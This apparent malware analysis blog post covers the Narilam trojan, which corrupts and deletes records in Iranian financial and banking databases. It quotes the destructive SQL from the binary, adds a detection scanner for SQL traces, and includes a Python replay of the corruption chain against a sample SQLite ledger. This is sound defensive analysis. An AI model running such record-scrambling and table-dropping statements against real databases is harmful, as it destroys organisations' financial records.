Friday, November 30, 2012

"Narilam" Malware Attacks Iranian Financial Infrastructure

Iranian infrastructure has been on attackers' radar for the last couple of years. We have already witnessed some of the most organized and sophisticated attacks, such as Stuxnet and Duqu, directed against it. We have now come across yet another attack against Iran, one that primarily targets the MSSQL databases of a few Iranian financial software packages. The attack has been named "Narilam" after one of the applications it targets, "Maliran" (the malware name is that product name spelled backwards).

I analyzed several samples of this malware, one of which was about 2MB. From the binaries’ headers, it looks as though this attack has been going on for a while: The Trojan was compiled with Borland C++ in 2010.

One of the samples I looked at carried a compile timestamp as far back as 2002. Although such header timestamps can be faked, while analyzing the code we found the date April 25, 2010 embedded in it, which leads us to believe that this threat has existed for more than two years.

The Iranian CERT team has published an alert for this malware, indicating that Narilam has been known since 2010 by a different name.

Targets of Narilam malware:

The installation process of this malware is fairly standard: it creates start-up registry entries and copies itself as lsass.exe into the system directory, borrowing the name of the legitimate Windows Local Security Authority process so that it blends into a process list. It then targets certain SQL databases and tables belonging to the following Iranian finance and banking software:

Maliran (integrated financial and applications software)
Shahd (integrated financial, commercial, and retail software)
Amin (banking software)

Narilam checks for the presence of this software and exits if none of it is installed on the infected system.



Although the malware code does not seem to employ any sophisticated techniques compared with its predecessors, it connects to the specific databases via OLE DB and sends SQL queries that update or delete records and drop tables with specific names. Here are some of the SQL queries we found in the code, reproduced as they appear in the binary:
  • Update Asnad Set SanadNo=@SanadNo1,LastNo=@SanadNo1,FirstNo=@SanadNo1 Where Cast(SanadNo as int)=@SanadNo and Raj=@Raj
  • Set @SanadNo=(select Max(Cast(sellercod As int )) from A_Sellers
  • Delete from A_Sellers Where Cast(sellercod as int)=@SanadNo
  • Update A_TranSanj Set Tranid=@SanadNo1 Where Cast(Tranid as int)=@SanadNo and Raj=@Raj
  • Delete from Koll Where Cast(Koll as int)=@SanadNo
  • Delete from Moein Where Cast(Moein as int)=@SanadNo
  • Drop table Holiday_1
  • Set @SanadNo=Round(@SanadNo * (SELECT RAND(@IDLE)),0,0
  • Set @Raj=(select Max(Raj) from R_DetailFactoreForosh Where Cast(SanadNoForosh as int)=@SanadNo
  • Update R_DetailFactoreForosh Set SanadNoForosh=@SanadNo1 Where Cast(SanadNoForosh as int)=@SanadNo and Raj=@Raj
 

Here are some of the database tables whose records Narilam updates or deletes:

Holiday_1
Holiday_2
A_Sellers
A_TranSanj
Koll
R_DetailFactoreForosh
Moein
Tafsily
Vamghest

Some of the tables dropped from the database:

Holiday_1
Holiday_2
A_Sellers

We also came across a SQL query that accesses MS SQL Server's sysobjects system table, which lists the objects in a database; this is presumably how the malware checks whether the targeted tables exist before issuing its updates, deletes and drops.
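Because the statement text quoted from the binary names the tables and verbs directly, it doubles as a detection signature for anyone who can capture query text on the SQL Server (a trace or Extended Events session on batch completion). The following scanner is an added example, not code from the original post or from Tarrah Systems. The sample trace is constructed: three tab-separated fields (timestamp, login name, statement text), roughly what a flattened SQL:BatchCompleted export looks like; that layout and the login names are assumptions. The caveat it encodes is that the legitimate application also updates and deletes rows in these tables, so a single UPDATE or DELETE is only medium confidence; a DROP TABLE on a targeted table, or a sysobjects probe followed by modifications from the same login, is what actually stands out.

```python
"""Signature scan for Narilam-style statements in captured SQL Server query text.

Added example, not code from the original post or from the vendor. The trace
below is constructed: three tab-separated fields (timestamp, login name,
statement text); the field layout and the login names are assumptions.
"""
import re

# Tables the post lists as targets, plus Asnad, which appears only in the
# quoted UPDATE statement. Lower-cased for case-insensitive matching.
NARILAM_TABLES = {
    "holiday_1", "holiday_2", "a_sellers", "a_transanj", "koll",
    "r_detailfactoreforosh", "moein", "tafsily", "vamghest", "asnad",
}

# Verb plus object name; tolerates an optional schema prefix and [brackets].
_STMT = re.compile(
    r"\b(drop\s+table|delete\s+from|update)\s+"
    r"(?:\[?\w+\]?\s*\.\s*)?\[?(\w+)\]?",
    re.IGNORECASE,
)
_SYSOBJECTS = re.compile(r"\bsysobjects\b", re.IGNORECASE)


def classify(verb: str, table: str):
    """Severity for one statement, or None if it touches no targeted table.
    DROP is unambiguous; UPDATE/DELETE are what the legitimate application
    also does, so on their own they are only medium."""
    if table.lower() not in NARILAM_TABLES:
        return None
    return "high" if verb == "drop table" else "medium"


def scan_statement(sql: str) -> list:
    """Return (verb, table, severity) for every flagged statement in one batch."""
    found = []
    if _SYSOBJECTS.search(sql):
        # Catalog probe: how a process can check whether the targeted tables exist.
        found.append(("catalog-probe", "sysobjects", "info"))
    for m in _STMT.finditer(sql):
        verb = re.sub(r"\s+", " ", m.group(1)).lower()
        table = m.group(2)
        sev = classify(verb, table)
        if sev:
            found.append((verb, table, sev))
    return found


def scan_trace(trace: str) -> list:
    """Walk tab-separated trace lines and collect hits with line number and login."""
    hits = []
    for lineno, line in enumerate(trace.splitlines(), 1):
        parts = line.split("\t", 2)
        if len(parts) != 3:
            continue  # malformed or truncated line: skip rather than guess
        _ts, login, sql = parts
        for verb, table, sev in scan_statement(sql):
            hits.append({"line": lineno, "login": login, "verb": verb,
                         "table": table, "severity": sev})
    return hits


def suspicious_logins(hits: list) -> set:
    """A login is suspicious if it dropped a targeted table, or probed the
    catalog and then modified targeted tables in the same capture."""
    by_login = {}
    for h in hits:
        by_login.setdefault(h["login"], set()).add(h["severity"])
    return {login for login, sevs in by_login.items()
            if "high" in sevs or {"info", "medium"} <= sevs}


# Constructed sample: the application login doing normal work, and a second
# login that probes the catalog and then issues statements matching the binary.
SAMPLE_TRACE = (
    "2012-11-28 09:14:02\tmaliran_app\tSELECT * FROM Asnad WHERE SanadNo='0250'\n"
    "2012-11-28 09:14:05\tsa\tselect name from sysobjects where xtype='U'\n"
    "2012-11-28 09:14:05\tsa\tDelete from A_Sellers Where Cast(sellercod as int)=250\n"
    "2012-11-28 09:14:06\tsa\tDrop table Holiday_1\n"
    "2012-11-28 09:15:10\tmaliran_app\tUPDATE Asnad SET LastNo='0251' WHERE SanadNo='0250'\n"
)

if __name__ == "__main__":
    found = scan_trace(SAMPLE_TRACE)
    for h in found:
        print(h)
    print("suspicious logins:", suspicious_logins(found))
```

Run against the constructed trace, only the `sa` login is flagged: it probes sysobjects, deletes from A_Sellers and drops Holiday_1, while the application login's UPDATE on Asnad stays at medium and is not reported on its own. In a real deployment the login/host pair of the infected workstation is the more useful pivot than the statement text.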
The binary also contains a code sequence that further corrupts the database by overwriting record numbers with random values; the query above that multiplies @SanadNo by RAND(@IDLE) is part of that sequence.
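To make concrete what the quoted query list and this random-corruption routine do to a ledger, here is a replay of the chain against a throwaway SQLite database. This is an added example, not code from the malware or from Tarrah Systems. Only the table and column names come from the strings quoted above; the schemas, the sample rows and the order of the statements are assumptions (the binary yields fragments, not the complete chain). T-SQL variables become Python values, RAND(@IDLE) becomes a seeded random.Random, ROUND(x, 0, 0) becomes int(round(x)), and @SanadNo1 is read as the random replacement number. The report function afterwards does the check a defender would run: which tables still exist (the sqlite_master lookup is the analogue of querying sysobjects) and how many documents now reference a seller code that no longer exists.

```python
"""Replay of the quoted Narilam query chain against a throwaway SQLite database.

Added example, not code from the malware or from Tarrah Systems. Only the
table and column names come from the strings quoted in the post; the schemas,
the sample rows and the ordering of the statements are assumptions.
"""
import random
import sqlite3


def build_sample_db() -> sqlite3.Connection:
    """In-memory ledger with constructed rows; document numbers are stored as
    zero-padded text, which is why the malware casts them to int."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE A_Sellers (sellercod TEXT, name TEXT);
        CREATE TABLE Asnad (SanadNo TEXT, FirstNo TEXT, LastNo TEXT, Raj INTEGER);
        CREATE TABLE R_DetailFactoreForosh (SanadNoForosh TEXT, Raj INTEGER, amount REAL);
        CREATE TABLE Holiday_1 (day TEXT);
        INSERT INTO A_Sellers VALUES ('0100','seller A'), ('0250','seller B'), ('0175','seller C');
        INSERT INTO Asnad VALUES ('0250','0250','0250',1), ('0250','0250','0250',2), ('0175','0175','0175',1);
        INSERT INTO R_DetailFactoreForosh VALUES ('0250',1,100.0), ('0250',2,50.0), ('0175',1,75.0);
        INSERT INTO Holiday_1 VALUES ('1391-09-10');
    """)
    return con


def narilam_round(con: sqlite3.Connection, idle_seed: int) -> dict:
    """One pass over the quoted statements: take the highest seller code,
    derive a random replacement number, rewrite the documents that reference
    the code, delete the seller and drop Holiday_1. Statement order is assumed."""
    cur = con.cursor()
    # Set @SanadNo=(select Max(Cast(sellercod As int )) from A_Sellers
    target = cur.execute(
        "SELECT MAX(CAST(sellercod AS int)) FROM A_Sellers").fetchone()[0]
    # Set @SanadNo=Round(@SanadNo * (SELECT RAND(@IDLE)),0,0   (assumed to yield @SanadNo1)
    replacement = int(round(target * random.Random(idle_seed).random()))
    # Set @Raj=(select Max(Raj) from R_DetailFactoreForosh Where Cast(SanadNoForosh as int)=@SanadNo
    raj = cur.execute(
        "SELECT MAX(Raj) FROM R_DetailFactoreForosh WHERE CAST(SanadNoForosh AS int)=?",
        (target,)).fetchone()[0]
    # Update Asnad Set SanadNo=@SanadNo1,LastNo=@SanadNo1,FirstNo=@SanadNo1 Where Cast(SanadNo as int)=@SanadNo and Raj=@Raj
    cur.execute(
        "UPDATE Asnad SET SanadNo=?, LastNo=?, FirstNo=? "
        "WHERE CAST(SanadNo AS int)=? AND Raj=?",
        (replacement, replacement, replacement, target, raj))
    asnad_rewritten = cur.rowcount
    # Update R_DetailFactoreForosh Set SanadNoForosh=@SanadNo1 Where Cast(SanadNoForosh as int)=@SanadNo and Raj=@Raj
    cur.execute(
        "UPDATE R_DetailFactoreForosh SET SanadNoForosh=? "
        "WHERE CAST(SanadNoForosh AS int)=? AND Raj=?",
        (replacement, target, raj))
    # Delete from A_Sellers Where Cast(sellercod as int)=@SanadNo
    cur.execute("DELETE FROM A_Sellers WHERE CAST(sellercod AS int)=?", (target,))
    sellers_deleted = cur.rowcount
    # Drop table Holiday_1
    cur.execute("DROP TABLE IF EXISTS Holiday_1")
    con.commit()
    return {"target": target, "replacement": replacement, "raj": raj,
            "asnad_rewritten": asnad_rewritten, "sellers_deleted": sellers_deleted}


def damage_report(con: sqlite3.Connection) -> dict:
    """Defender's check: which tables survive (sqlite_master stands in for
    sysobjects) and how many documents point at a seller code that no longer
    exists. The Asnad.SanadNo -> A_Sellers.sellercod link is assumed from the
    way the malware reuses @SanadNo across both tables."""
    cur = con.cursor()
    tables = {r[0] for r in cur.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")}
    sellers = cur.execute("SELECT COUNT(*) FROM A_Sellers").fetchone()[0]
    orphans = cur.execute(
        "SELECT COUNT(*) FROM Asnad WHERE CAST(SanadNo AS int) NOT IN "
        "(SELECT CAST(sellercod AS int) FROM A_Sellers)").fetchone()[0]
    return {"tables": tables, "sellers": sellers, "orphaned_documents": orphans}


if __name__ == "__main__":
    db = build_sample_db()
    print("before:", damage_report(db))
    print("round :", narilam_round(db, idle_seed=1))
    print("after :", damage_report(db))
```

Even a single pass leaves the ledger inconsistent in a way that is not obvious from row counts alone: one document for seller 250 is renumbered to a random value, the other still carries the old number, and the seller row itself is gone, so both documents now reference a seller that does not exist. That is why the vendor's advice to keep restorable backups is the only real remedy; nothing in the data identifies which numbers were original.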
All the financial and banking software targeted by this malware are products of the Iranian company Tarrah Systems, which issued a warning about W32.Narilam on its website a couple of days ago. The company asked customers using the targeted products to back up their databases.
From the multiple samples analyzed, this code appears to have been written to corrupt and delete the databases used by these applications, causing potential financial losses to their users. The likely targets are corporates and banks that have these applications installed. Users of these applications should back up their databases regularly, and verify that the backups restore, so that a corrupted ledger can be rolled back rather than reconstructed.
